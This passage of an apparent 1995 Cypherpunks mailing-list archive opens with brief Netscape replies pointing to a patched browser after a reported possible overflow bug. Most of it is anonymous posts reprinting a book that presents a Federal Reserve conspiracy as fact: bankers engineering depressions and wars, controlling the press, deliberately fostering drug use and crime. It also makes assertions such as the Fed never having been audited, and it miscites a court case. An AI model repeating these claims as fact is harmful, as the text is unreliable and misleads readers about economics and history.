> after some of the other browsers... I know, for instance, that AOL's
> browser dies horribly on these same sort of URLs.

  The patched version is now available at ftp://ftp.netscape.com/pub/netscape/

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 22:48:34 PDT
To: cypherpunks@toad.com
Subject: Re: It's Wednesday
In-Reply-To: <199509271646.MAA06516@panix.com>
Message-ID: <44dcts$b36@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509271646.MAA06516@panix.com>, frissell@panix.com (Duncan Frissell) writes:
> Do you know where your new Netscape is?

  Sure.  It's on ftp://ftp.netscape.com/pub/netscape.  It has been there
for several hours.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jsw@neon.netscape.com (Jeff Weinstein)
Date: Wed, 27 Sep 95 22:49:54 PDT
To: cypherpunks@toad.com
Subject: Re: Another Netscape Bug (and possible security hole)
In-Reply-To: <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil>
Message-ID: <44dd09$b36@tera.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <9508278122.AA812233405@ax.asc-yf.wpafb.af.mil>, donlonm@ccmail.mcclellan.af.mil writes:
> Ray,
> 
> You wrote:
> 
> >I've found a Netscape bug which I suspect is a buffer overflow and 
> >may have the potential for serious damage. If it is an overflow bug, 
> >then it may be possible to infect every computer which accesses a web 
> >page with Netscape. 
> 
> Is there any way to avoid/prevent this problem by changing options in 
> NetScape?

  Just get the fixed version, or a patch from:

ftp://ftp.netscape.com/pub/netscape/

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 28 Sep 95 03:43:55 PDT
To: Jeff Weinstein <jsw@neon.netscape.com>
Subject: Re: It's Wednesday
In-Reply-To: <44dcts$b36@tera.mcom.com>
Message-ID: <Pine.SUN.3.91.950928064141.6955B-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



On 28 Sep 1995, Jeff Weinstein wrote:

>   Sure.  It's on ftp://ftp.netscape.com/pub/netscape.  It has been there
> for several hours.

Late Wednesday.  Of course whoever created the directories/files had his 
machine date set to *1994* so some of same are date stamped Tuesday 
September 27 1994.

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Sep 95 23:11:31 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509280611.HAA02214@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


that they do. 95% of all "cash" transactions in the U.S. are by check.
Checks are thus effectively also currency. The banker creates the so-
called "loan" by writing a check or deposit slip, not against actual
money, but against your promise to pay back the loan. The only cost to the
bank is the paper, ink, and a few dollars in salaries and office costs for
each transaction. It is "check-kiting" on an enormous scale! The profits
are enormous as shown below.

                 THE COST TO YOU? PRACTICALLY EVERYTHING

   In 1910 the U.S. federal debt was $1,147,000,000 - $12 per citizen.
State and local debts were practically non-existent, and government was
small and not oppressive.

   By 1920, after only six years of the Federal Reserve handling our
currency, the federal debt had jumped to $24 billion - $228 per citizen.
The Federal Government began to grow like an invisible cancer in its
early stages.

   By 1968 the federal debt had jumped to $347 billion - $1,717 per
citizen. Ten years later, by 1978 it had doubled again to $763 billion
- $3,500 per citizen. That is a debt of $17,500 for every family of five
in America. Federal debt has been growing faster and faster since. And
the Federal Government has become a debilitating cancer rapidly sapping
and weakening its victim.

   Today in 1992 the federal debt is over $4 trillion. (And they "cook the
books" on the low side to come up with that figure - see Chapter Nine.)
The $4 trillion national debt amounts to $16,000 per citizen, or $80,000
per family of five. And if that debt were calculated in terms of working
or tax-paying families, it would be considerably higher. The Federal Gov-
ernment has become a bloated, out-of-control parasite, a terminal cancer.
The economy seems so weak that even after many months of blowing up the
currency supply, signs of recovery have to be searched for. The entire
system may be on the brink of complete collapse.

   The above figures do not include state, municipal, school district,
business, or personal debts, which total an additional $3 trillion. Total
debt in America is thus over $7 trillion - $28,000 per citizen - $120,000
per family of five. This is more than twice the assessed value of all the
land and buildings in America. Effectively all of America has been signed
over to the bankers. They can take America and we would still owe them
another America! Of course, it is to their advantage not to take actual
title to the property, so we will not realize that we really own nothing.
Instead they leave us with "ownership" so we will willingly continue to
work and pay ever higher tributes to the bankers.

   What we really have is national bankruptcy. Let me repeat the words of
Senator John Danforth:
   "I have never seen more senators express discontent with their jobs..
I think the major cause is that, deep down in our hearts, we have been
accomplices to doing something terrible and unforgivable to this won-
derful country. Deep down in our hearts, we know that we have bankrupted
America and that we have given our children a legacy of bankruptcy.... We
have defrauded our country to get ourselves elected."

         THE INEXORABLE TRANSFER OF WEALTH TO THE BANKERS

   To grasp the fact that periodic withdrawal of currency through interest
payments to the bankers will inexorably transfer all wealth in the nation
to the receivers of interest, imagine yourself in a poker or dice game.
Everyone has to buy chips (the medium of exchange) from a "banker" who
does not risk chips in the game, but watches the table and every hour rea-
ches in and takes 10% to 15% of all the chips on the table. As the game
progresses, the number of chips in the possession of each player will go
up and down with his or her "luck." However, the total number of chips
available to play the game (carry on business and trade) will decrease
steadily, while the "banker's" mountain of chips just grows and grows.

   The game will get low on chips, and some players will run out. If they
want to continue to play, they must buy or borrow more chips from the
"banker." The "banker" will sell (lend) the player more chips only if the
player signs a "mortgage" agreeing to give the "banker" some real pro-
perty (car, home, farm, business, etc.). If the payments should go into
default, the banker takes the property. The payments must be made on time,
whether the player wins (makes a profit) or not.

   It is easy to see that no matter how skillfully the players play,
eventually the "banker" will end up with all of his chips back. Except
for the very best or "luckiest" players, the rest, if they stay in the
game long enough, will end up owing to the "banker" their cars, their
homes, their farms, their businesses, and perhaps even their watches,
rings, and the shirts off their backs!

   Sir Josiah Stamp, President of the Bank of England in the 1920s, and
the second richest man in Britain at the time, said:
   "Banking was conceived in iniquity and was born in sin. The bankers
own the earth. Take it away from them but leave them in power to create
deposits, and with the flick of the pen they create enough deposits to
buy it back again. However, take it away from them, and all the great
fortunes like mine will disappear, and they ought to disappear, for this
would be a happier and better world to live in. But, if you wish to re-
main the slaves of bankers and pay the cost of your own slavery, let
them continue to create deposits."

   Our real-life situation is much worse than any poker game. In a poker
game no one is forced to go into debt, and anyone can quit at any time
and keep whatever he or she still has. But in real life, even if we borrow
little ourselves from the bankers, the local, state, and federal govern-
ments borrow billions in our name, squander it, then confiscate our earn-
ings from us and pay it to the bankers with interest. We are forced to
play their game, and it seems we can only leave the game by dying. We
pay as long as we live, and our children pay after we die. If we cannot
pay, the same government sends the police to take our property and give
it to the bankers. The bankers risk nothing (at least, the Federal
Reserve bankers) in the game; they just collect their percentage and "win
it all." In Las Vegas all the games are "rigged" to pay the house (owner)
a percentage. They rake in millions. The Federal Reserve bankers' "game"
is similarly rigged, and it pays off in billions.

   In recent years bankers have added more "cards" to their game.
"Credit" cards are promoted as a convenience and a great boon to trade.
Actually, they are ingenious devices by which bankers collect 2% to 5%
of every retail sale from the seller and 18% or more interest from buy-
ers. A real stacked deck!

              POLITICIANS AND BANKERS IN THE SAME LEAGUE

   Democrat, Republican, and Independent voters have wondered why poli-
ticians always spend more tax currency than they collect. The reason
should now be clear. When you study our "debt-currency" system, you soon
realize that the politicians are not the agents of the people. They are
the agents of the Federal Reserve Bankers, for whom they plan ways to
place the people further in debt. Let me again quote the words of Senator
John Danforth:
   "I have never seen more senators express discontent with their jobs...
I think the major cause is that, deep down in our hearts, we have been
accomplices to doing something terrible and unforgivable to this wonder-
ful country. Deep down in our hearts, we know that we have bankrupted
America and that we have given our children a legacy of bankruptcy....
We have defrauded our country to get ourselves elected."

   Article 1, Section 8 of the U.S. Constitution states, "The Congress
shall have power... to coin money, regulate the value thereof..." But what
have our politicians done? In 1913 they traitorously gave the U.S. Treasury
to the Federal Reserve bankers - lock, stock, and barrel! Someone recently
asked, "What's the difference between Kindergarten and Congress?" Answer:
"One has adult supervision!" Actually, we shouldn't criticize Congress,
after all, we have the best Congress money can buy. Chapter Ten examines
Congress in more detail.

                    FEDERAL RESERVE SYSTEM AUDIT

   The Federal Reserve has never been audited by the government. In 1975
a bill H.R. 4316, to require Federal Reserve audits, was introduced in
Congress. Due to pressure from the currency-controllers, it was rejected.
No audit of the Federal Reserve has ever been done.

                       MOUNTING DEBTS AND WARS

   We, as a people are now ruled by a "banker-owned system" that has
usurped the mantle of government, disguised itself as our legitimate
government, and set about to pauperize and control the people. It is now
a centralized, all-powerful apparatus whose main purposes are spending the
people's currency, promoting war, and propagandizing to perpetuate itself
in power. Our two large political parties (the "Demopublicans" also call-
ed "Republicrats") have become its servants, the various departments of
government its spending agencies, and the Internal Revenue Service its
collection agency.

   Unknown to the people, our "banker-owned system" operates in close
cooperation with similar apparatuses in other nations, also disguised as
"governments." Some, we are told, are friends. Others, we are told, are
enemies. "Enemies" are built up through international manipulations and
used to frighten the American people into going billions of dollars more
into debt to the bankers for "military preparedness," "foreign aid to
stop communism," "minority rights," etc. Citizens, deliberately confused
by brainwashing propaganda, watch helplessly while our politicians give
our food, goods, and gold to banker-controlled alien governments under the
guise of "better relations," "easing tensions," or "humanitarian aid."
Our banker-controlled government takes our finest and bravest sons and
sends them into foreign wars, where tens of thousands are murdered and
hundreds of thousands are crippled. Other thousands are morally corrupted
and addicted to drugs. When the "war" is over we have gained nothing, but
we are scores of billions more in debt to the bankers - which was the real
reason for the war in the first place!

                   MORE THAN JUST ECONOMIC RAPE

   The profits from these massive debts have been used to erect a com-
plete and almost hidden economic and political colossus over our nation.
Our "banker-owned system" keeps telling us they are trying to do us good,
when in truth they work to harm and injure the people. These would-be
despots know it is easier to control and rob an ignorant, poorly-educated,
and confused people than it is an informed population, so they deliber-
ately degrade our educational systems. For the same reason they secretly
favor drug use, alcohol, racial conflict, and crime in general. Their "war
on drugs," as an example, only produces more drug use and a host of relat-
ed crimes. Everything which debilitates the minds and bodies of the people
is secretly encouraged, as it makes the people less able to oppose them,
or even to understand what is being done to them. The system wants medio-
cre, unthinking, helpless "sheople."

   Family, morals, and all that is honorable is being swept away, while
our "banker-owned system" builds their new subservient man, the found-
ation of their "new world order." Our new rulers are trying to change our
whole political, social, and racial order, but they will not change the
debt-currency economic system by which they rob and rule. Our people have
become tenants and "debt-slaves" to the bankers and their agents in the
land our fathers conquered. It is conquest through the most gigantic
fraud and swindle in the history of humankind. And we remind you again:
The key to their wealth and power over us is their MONOPOLISTIC ability
to "create" currency out of nothing and to lend it to us at interest. If
Congress had not allowed them to do that, they never would have gained
secret control over our nation.

                   CONTROLLED NEWS AND INFORMATION

   This currency-lender conspiracy ("consPIRACY") is as old as Babylon.
Even in America it dates far back before 1913. Actually, 1913 was the
year in which the way opened for complete economic conquest of our peo-
ple. The conspiracy is old enough to America so that the system's agents
have been for many years in positions such as newspaper publishers, edi-
tors, columnists, church ministers, university presidents, professors,
textbook authors, attorneys, accountants, labor union leaders, movie mak-
ers, radio and TV commentators, politicians from school board members to
U.S. Presidents, and many others.

   These agents control the information available to our people. They
manipulate public opinion, elect who they will locally and nationally,
and never expose the crooked currency system. They promote school bonds,
municipal bonds, expensive and detrimental farm programs, "urban renew-
al," "foreign aid," and many other schemes which will put the people more
in debt to the bankers. Thoughtful citizens wonder why billions are spent
on one program and billions on another which may duplicate or even null-
ify it, such as paying some farmers not to raise crops, while at the same
time building dams or canals to irrigate more farm land. Crazy or stupid?
Neither. The goal is more debt. Thousands of government-sponsored ways to
waste "money" are perpetrated continually. Most make no sense, but they
are never exposed for what they really are: builders of billions for the
bankers and debts for the people.

   So-called "economic experts" write syndicated columns in hundreds of
newspapers, craftily designed to prevent the people from learning the
simple truth about our debt-currency system. Commentators on radio and
TV, educators, and politicians blame the people as wasteful, lazy, or
spendthrift, and blame the workers and consumers for the increase in
debts and the inflation of prices, when they really know that the basic
cause is the debt-currency system itself. Our people are drowned in char-
ges and counter-charges designed to confuse them and keep them from under-
standing the evil currency system that so silently robs the workers, farm-
ers, and business people of the fruit of their labor. And, increasingly,
the system is being used to rob us of our rights and freedoms, supposedly
guaranteed by the U.S. Constitution.

   In his book INVENTING REALITY,  Michael Parenti wrote:
   "Ten business and financial corporations control the three major tele-
vision and radio networks (NBC, CBS, ABC), 34 subsidiary television stat-
ions, 201 cable TV systems, 62 radio stations, 20 record companies, 59
magazines, 58 newspapers, including the NEW YORK TIMES, the WASHINGTON
POST, THE WALL STREET JOURNAL, and the LOS ANGELES TIMES, 41 book pub-
lishers and various motion picture companies like Columbia Pictures and
Twentieth Century Fox. Three quarters of the major stockholders of ABC,
CBS and NBC are banks, such as Chase Manhattan, Morgan Guaranty Trust,
Citibank, and Bank of America.
   The overall pattern is one of increasing concentration of ownership
and earnings. According to a 1982 LOS ANGELES TIMES survey, independent
daily newspapers are being gobbled up by the chains at the rate of fifty
or sixty a year. Ten newspaper chains earn over half of all newspaper rev-
enue in this country. Five media conglomerates share 95 percent of the
record and tapes market with Warner and CBS alone controlling 65 percent
of the market. Eight Hollywood studios account for 89 percent of U.S.
feature film rentals. Three television networks earn over two-thirds of
total U.S. television revenues. Seven paperback publishers dominate the
mass market for books...
   While having an abundance of numbers and giving an appearance of di-
versity, the mass media actually are highly centralized outlets that
proffer a remarkably homogenized fare. News services for dailies through-
out the entire nation are provided by the Associated Press and United
Press International (which may soon merge with AP or go under), The New
York Times-Washington Post wire services, and several foreign wire ser-
vices like Reuters. The ideological viewpoint of these news conduits are
pretty much the same, marked by prefabricated standardization of news
which is constricting and frightening."

   In his book THE MEDIA MONOPOLY, Ben H. Bagdikian writes:
"The power to control information is a major lever in the control of
society. Giving citizens a choice in ideas and information is as impor-
tant as giving them a choice in politics. If a nation has narrowly con-
trolled information it will soon have narrowly controlled politics."

   When a few informed and concerned people or organizations who know the
truth begin to expose the bankers and their agents, or try to stop any of
their mad schemes, the messengers are ridiculed and smeared as "right-
wing extremists," "super-patriots," "bigots," "racists," "fascists," or
"antisemites." Any name is used to discredit them, and to stop other peo-
ple from listening. Books and articles such as you are now reading are
kept out of schools, libraries, and book stores.

   Some, who are especially vocal in their exposure of the treason com-
mitted against our people, are harassed by government agencies such as
the IRS, FDA, EPA, OSHA, and others, causing them financial loss or bank-
ruptcy. Sometimes their businesses and homes are violently raided at gun-
point, and their money, currency, equipment, and records confiscated, so
it is very difficult, if at all possible to continue their business. In
Chapter One the National Commodity and Barter Association was mentioned as
an example of such raids. But the most striking case has been that of Ezra
Pound, which is covered below.

   Using these methods, the Federal Reserve bankers and their agents have
been completely successful in preventing most Americans from learning the
things you are reading in this report. However, in spite of their control
of information, they realize that more and more citizens are learning the
truth. Therefore, to prevent retaliation and armed resistance to their
plunder of America, they plan to register all firearms and eventually
disarm all citizens. They want to eliminate all guns not in the hands of
their government police or army. Our wise Founding Fathers wrote the Se-
cond Amendment to the Constitution so that the people could protect them-
selves against the government.

   Love of life, interest in your freedom, compassion for humanity, con-
cern for your children, and the safety of all you have worked for should
make you deeply interested in this, America's greatest problem. Our gener-
ation has not suffered under the bankers' yoke as the coming generations
will. Usury and taxes will continue to take a larger and larger part of
the earnings of the people and put them deeper into the pockets of the
bankers and their agents. Increasing "government" regulations will prevent citizen
protest and opposition to their control. Is it possible that your grand-
children will own neither car nor home, but will live in "government-
owned" apartments and ride to work in "government-owned" buses, and be
allowed to keep just enough of their earnings to buy a minimum of food and
clothing, while their rulers wallow in luxury? In Asia and Eastern Europe
this used to be called communism. In America it is called democracy or
capitalism.

   Horace Greeley stated, "While boasting of our noble deeds, we are
careful to conceal the ugly fact that by an iniquitous currency system
we have nationalized a system of oppression which, though more refined, is
no less cruel than the old system of chattel slavery."

                     THE CASE OF EZRA POUND

   Ezra Pound was a poet, one of America's greatest - if not the great-
est. He played a major role in the development of writers and poets, such
as E.E. Cummings, T.S. Eliot, Robert Frost, Ernest Hemingway, James Joyce,
and William Carlos Williams. He also studied politics, economics, banking,
and monetary theory. He disapproved of war. During World War II, he hid a
number of Jews from the Nazi exterminators; if discovered the penalty
would have been death. He broadcast a series of talks on Italian radio
aimed at Americans. He had wanted America to stay out of the war, and he
said some uncomplimentary things about President Franklin D. Roosevelt. He
also stated some of his political and monetary ideas. He was accused of
being a traitor. At the end of the war he was imprisoned in an American
concentration camp near Pisa, Italy for six months without trial. Then he
was transferred to America where he was declared insane and imprisoned in
a mental hospital in Washington D.C. for thirteen years. After which the
treason charges, for which he had never stood trial, were dropped, and he
was released. He returned to Italy, where he lived until his death in
1972.

   The reason he was not tried seems to be that his prosecutors didn't
have a case that would hold up in court and/or they were afraid that he
would repeat in court what he had said over the radio in Italy. Wendell
Muncie, M.D., one of the psychiatrists involved in his "sanity hearing,"
said that Pound's insanity consisted of three factors: his passion for the
U.S. Constitution, his espousal of the Confucian ethic, and his desire for
world peace. No formal diagnosis of Pound's supposed "insanity" has been
found. His captors in Washington openly admitted that Pound was a polit-
ical prisoner. A Congressional investigation started in 1957 and completed
in 1958 exposed the inadequacy of the case against Pound and led to his
release.
   Here are some extracts from Pound's radio talks:
."I think an alliance with Stalin's Russia is rotten." (January 29, 1942)
."Liberty is not a right but a duty." (March 8, 1942)
."Sovereignty inheres in the right to issue money. And the American sov-
ereignty belongs by right to the people, and their representatives in
Congress have the right to issue money and to determine the value thereof.
And 120 million, 120 million suckers have lamentably failed to insist on
the observation of this quite decided law.... Now the point at which em-
bezzlement of the nation's funds on the part of her officers becomes trea-
son can probably be decided only by jurists, and not by hand-picked judges
who support illegality." (April 9, 1942)
.Quotes read by Pound: 1. "'I believe that banking institutions are more
dangerous to our liberties than standing armies.' - Thomas Jefferson.
2. 'I have two great enemies, the southern army in front of me and the
financial institutions in the rear. Of the two, the one in the rear is the
greatest enemy.' - Abraham Lincoln.
3. 'The money power preys upon the nation in times of peace and conspires
against it in times of adversity. It is more despotic than monarchy, more
insolent than autocracy, more selfish than bureaucracy; it denounces as
public enemies all who question its methods, or throw light upon its
crimes.' - William Jennings Bryan." (July 26, 1942)
.Back to Pound's own words: "Wars in old times were made to get slaves.
The modern implement of imposing slavery is debt." (March 25, 1943)
."The phase of the usury system which we are trying to analyze is more or
less Patterson's perception that the Bank of England could have benefit
of all the interest on all the money that it creates out of nothing....
Now the American citizen can, of course, appeal to his constitution, which
states that Congress shall have power to coin money or regulate the value
thereof and of foreign coin. Such appeal is perhaps quixotic." (March 30,
1943)
."That text is known to them that have the patience to read it, possibly
one-hundredth of one percent of the denizens. They forget it, all save
a few Western states. I think somebody in Dakota once read it. The Consti-
tution." (June 30, 1943)

       THE FEDERAL RESERVE SYSTEM IS UNCONSTITUTIONAL AND ILLEGAL

   Although there has never been a court case that challenged the legal-
ity of the Federal Reserve System, there was a challenge to the National
Recovery Act or NRA, which was ruled unconstitutional. The U.S. Supreme
Court - Schechter Poultry v. U.S., 29 U.S. 495, 55 U.S. 837.842 (1935) -
ruled that, "Congress may not ABDICATE OR TRANSFER TO OTHERS ITS LEGITI-
MATE FUNCTIONS.." Article I, Section 8 of the U.S. Constitution states,
"The Congress shall have power... to coin money, regulate the value there-
of..." By passing the Federal Reserve Act, Congress abdicated and trans-
ferred to the Federal Reserve bankers its constitutionally legitimate
function of issuing and controlling money. If the Supreme Court ruling on
the NRA is applied to the Federal Reserve System, the unconstitutionality
and illegality of the Fed becomes obvious.

                        TELL THE PEOPLE

   America will not shake off her illegal banker-controlled dictatorship
as long as the people are ignorant of the hidden controllers. Interna-
tional bankers, who control most of the governments of the nations and
most sources of information, seem to have us completely in their grasp.
They are afraid of only one thing: an awakened citizenry armed with the
truth. An ignorant citizen is the banker-government's best "client." An
informed citizen is the banker-government's worst nightmare.

   Robert H. Hemphill, Credit Manager of the Federal Reserve Bank of At-
lanta Georgia, said:
   "This is a staggering thought. We are completely dependent on the com-
mercial banks. Someone has to borrow every dollar we have in circulation,
cash, or credit. If the banks create ample synthetic money, we are pros-
perous; if not, we starve. We are absolutely without a permanent money
system. When one gets a complete grasp of the picture, the tragic absur-
dity of our hopeless position is almost incredible, but there it is. It
is the most important subject intelligent persons can investigate and re-
flect upon. It is so important that our present civilization may collapse
unless it becomes widely understood and the defect remedied very soon."

                        PRIVATE BANKING

   In California a very private "non-bank" has been operating successfully
for fifteen years. It caters for accounts in gold or Federal Reserve
Notes. It is completely private and doesn't report to anyone. It pays in-
terest on both gold and Federal Reserve Note balances. Ideally, we need to
establish a network of private banks throughout the country, and even-
tually throughout the rest of the world. See Chapter Twelve.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Wed, 27 Sep 95 23:11:31 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509280611.HAA02217@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


   This is the best description of debt currency I've seen. Debt currency
is today's most effective form of slavery. It is today's American slavery.

                The text is from the book:

               THE ECONOMIC RAPE OF AMERICA
                 WHAT YOU CAN DO ABOUT IT

by Frederick Mann of Terra Libra

The book costs $19.95 plus $2 postage and handling.
It can be ordered from:

Terra Libra
2430 E. Roosevelt #998
Phoenix, Az 85008


                           CHAPTER THREE

                      THE FEDERAL RESERVE BANKERS

Then Jesus entered the temple and drove out all who were selling and buy-
ing in the temple, and he overturned the tables of the money changers and
the seats of those who sold doves. He said to them, "It is written, 'My
house shall be called a house of prayer'; but you are making it a den of
robbers."  Matthew 21, verses 12-13

   "All of the perplexities, confusion, and distress in America arises,
not from the defects of the Constitution or Confederation, not from want
of honor or virtue, so much as from downright ignorance of the nature of
coin, credit, and circulation."
                         John Adams, Founding Father
                      (In a letter to Thomas Jefferson, 1787)

   Congressman Louis T. McFadden said the following during a speech before
Congress on June 10, 1932:
   "Mr. Chairman, we have in this country one of the most corrupt institut-
ions the world has ever known. I refer to the Federal Reserve Board and the
Federal Reserve Banks. The Federal Reserve Board, a government board, has
cheated the Government of the United States and the people of the United
States out of enough money to pay the national debt. The depredations and
the iniquities of the Federal Reserve Board and the Federal Reserve banks
acting together have cost this country enough money to pay the national
debt several times over. This evil institution has impoverished and ruined
the people of the United States; has bankrupted itself, and has practi-
cally bankrupted our government. It has done this through the defects of
the law under which it operates, through the maladministration of that law
by the Federal Reserve Board, and through the corrupt practices of the
moneyed vultures who control it.
  Some people think the Federal Reserve banks are United States Government
institutions. They are not government institutions. They are private cre-
dit monopolies which prey upon the people of the United States for the
benefit of themselves and their foreign swindlers; and rich and predatory
money lenders. In that dark crew of financial pirates there are those who
would cut a man's throat to get a dollar out of his pocket; there are
those who send money into states to buy votes to control our legislation;
and there are those who maintain an international propaganda for the pur-
pose of deceiving us and wheedling us into the granting of new concessions
which will permit them to cover up their past misdeeds and set again in
motion their gigantic train of crime."

                PERVASIVE MONEY PROBLEMS IN AMERICA

   Americans, living in "the richest nation on earth," always seem to be
short of money. Women are working in unprecedented numbers, men hope for
overtime hours to earn more. Many take parttime jobs evenings and week-
ends. Children look for odd jobs to earn spending money. But the family
debt climbs higher. And psychologists say one of the biggest causes of
family quarrels and breakups is "arguments over money." Much of this
trouble can be traced to our "counterfeit money" system, which
leaves government free to perpetrate the most destructive monetary and
economic crimes.

   On the national scale, in just ten years the federal debt has grown
from less than one trillion dollars to over four trillion. (In Chapter Nine
we will discover that the real national debt is much bigger.) The annual
interest on that debt is over $250 billion. And now we are told (not ask-
ed) that we must come up with between $200 billion and $500 billion to
"save" the S & L institutions. All this for only one reason: to protect
and perpetuate a fundamentally flawed system whose only object is to en-
rich and empower the Federal Reserve bankers who own and operate the sys-
tem.

   During the last few years America has become by far the largest debtor
nation of the world. And our politicians have made their "contributions"
with boundless "generosity!" John Danforth, Republican senator from Miss-
ouri, was reported in the Arizona Republic of April 21, 1992 as follows:
  "I have never seen more senators express discontent with their jobs...
I think the major cause is that, deep down in our hearts, we have been ac-
complices to doing something terrible and unforgivable to this wonderful
country. Deep down in our hearts, we know that we have bankrupted America
and that we have given our children a legacy of bankruptcy.... We have de-
frauded our country to get ourselves elected."

          PAPER CURRENCY CAN BE A VERY PROFITABLE HUMAN CREATION

   Economists use the word "create" when speaking of the process by which
paper currency comes into existence. "Creation" means making something
that did not exist before. Lumbermen make boards from trees, workers build
houses from lumber, and factories manufacture automobiles from metal,
glass, and other materials. But in all these cases they did not CREATE.
They only changed existing materials into more usable and more valuable
forms. Not so with currency. Here we actually CREATE something out of
nothing. A piece of paper of little value is printed so it becomes worth a
piece of lumber. That difference in value is literally CREATED out of
nothing. And with different numbers printed on the piece of paper, it can
buy the automobile or even the house. The VALUE of the paper has been
CREATED in the true sense of the word.

   Paper currency can be created honestly or fraudulently. Gold and silver
certificates, being receipts for gold and silver, with a guarantee to pay
the bearer on demand, are honest paper currency. Federal Reserve Notes
currently in circulation constitute fraudulent, counterfeit paper curr-
ency.

   Counterfeit paper currency is very cheap to "create," and whoever
prints it makes a huge profit! Builders work hard to make a profit of 5%
above their cost in building a house. Auto makers sell their cars 1% to
2% above the cost of manufacture, which is considered good business. But
counterfeit paper currency "manufacturers" have no limit on their profits
since a few cents will print a $1 bill, a $100 bill, or even a $10,000
bill.

               THE DANGER OF A MONOPOLISTIC CENTRAL BANK

   Thomas Jefferson understood the danger of putting the power to control
the currency of a nation in the hands of a few individuals in the form of
a MONOPOLISTIC central bank. This is why he opposed Alexander Hamilton's
scheme to establish the First Bank of the United States. Let me repeat
what he said in 1791:
   "If the American people ever allow the banks to control issuance of
their currency, first by inflation and then by deflation, the banks and
corporations that grow up around them will deprive the people of all pro-
perty until their children will wake up homeless on the continent their
fathers occupied."

   President Andrew Jackson also understood the danger. He refused to re-
new the charter (a grant of MONOPOLY) of the Second Bank of the United
States. In 1836 Jackson said to the bankers trying to persuade him to re-
new their charter (so they could continue their harmful MONOPOLY):
   "You are a den of vipers. I intend to rout you out and by the Eternal
God I will rout you out. If the people only understood the rank injustice
of our money and banking system, there would be a revolution before morn-
ing."

   On December 22, 1913, the day before President Woodrow Wilson signed
the Federal Reserve Act, Congressman Charles A. Lindbergh Sr. (father of
the famous aviator) said to the House:
   "This Act establishes the most gigantic trust [*] on earth. When the
President signs this bill, the invisible government by the Monetary Power
will be legalized. The people may not know it immediately, but the day of
reckoning is only a few years removed. The trusts [*] will soon realize
that they have gone too far even for their own good. The people must make
a declaration of independence to relieve themselves from the Monetary
Power. This they will be able to do by taking control of Congress. Wall
Streeters could not cheat us if you Senators and Representatives did not
make a humbug of Congress... The greatest crime of congress is its curr-
ency system. The worst legislative crime of the ages is perpetrated by
this banking bill. The caucus and the party bosses have again operated and
prevented the people from getting the benefit of their own government."
[* At that time the word "trust" was synonymous with "MONOPOLY."]

                  THE DEPRESSION OF THE 1930s

   In 1930 America did not lack industrial capacity, fertile farmland,
skilled or willing workers, or industrious families. It had an extensive
and highly efficient transportation system in railroads, road networks,
and inland and ocean waterways. Communications between regions and local-
ities were the best in the world, utilizing telephone, teletype, radio,
and a well-operated mail system. No war had ravaged the cities or the
countryside, no pestilence weakened the population, nor had famine stalked
the land.

   In AMERICA'S GREAT DEPRESSION, Murray N. Rothbard, Professor of Eco-
nomics at the University of Nevada, Las Vegas, describes how the creation
of the Federal Reserve System increased the bankers' ability to inflate
the currency supply sixfold. During 1923 to 1929 the bankers did inflate
the currency supply enormously. Such an artificial inflation inevitably
brings about a subsequent need for deflation. Federal Reserve bankers, the
source of America's currency and credit, reduced the currency supply by
refusing loans to stable and growing industries, stores, and farmers. At
the same time they demanded payment on existing loans. They also increased
interest rates. Currency was rapidly taken out of circulation and was not
replaced. America was put in a depression and in deep trouble. Goods were
available to be purchased, jobs waiting to be done, but little currency
was available. Twenty-five percent of workers were laid off. Banks took
possession of tens of thousands of farms and businesses through foreclo-
sure. Gloom settled over America.
   The contraction of the currency supply caused the stock market to
collapse and the ensuing depression. Seven months before the collapse, Paul
Warburg, the main architect of the Federal Reserve System, in his annual
report to the stockholders of his International Acceptance Bank, wrote:
   "If the orgies of unrestrained speculation are permitted to spread, the
ultimate collapse is certain not only to affect the speculators themselves,
but to bring about a general depression involving the entire country."
   Both the inflation and the deflation, causing the depression, had been
planned - as predicted by Jefferson in 1791!

              CURRENCY INFLATION ENDED THE "GREAT DEPRESSION"

   The depression lasted until 1939, when the Federal Reserve System began
to send large amounts of currency into circulation for military prepared-
ness. As soon as the currency supply went up, people were hired back to
work, farms sold their produce instead of plowing it under, mines reopen-
ed, factories began to hum, both industrial and residential construction
began anew, and the "Great Depression" was over. Some politicians were
blamed for it and others took credit for ending it. The truth was that
bankers caused it and bankers ended it. The people were never told that
simple truth. The bankers who "manufacture" and "control" our currency
have used their huge profits to "buy" our politicians, and ultimately to
control our government.

                 POWER TO COIN AND REGULATE MONEY

   When we see the disastrous results of an artificially created shortage
of currency, we can better understand why our Founding Fathers insisted on
placing the power to create and control money in the hands of Congress.
Article I, Section 8 of the U.S. Constitution states, "The Congress shall
have power... to coin money, regulate the value thereof..."

   But in 1913 Congress passed the "Federal Reserve Act," relinquishing
the power to create and control money to the Federal Reserve Corporation,
a private company owned and controlled by bankers. The word "Federal" was
used only to deceive the people. The term "central bank" was carefully a-
voided. The Federal Reserve Act created a Board of Directors, the Federal
Reserve Board, to run the Federal Reserve Corporation with a MONOPOLY to
create and control the currency of the United States.

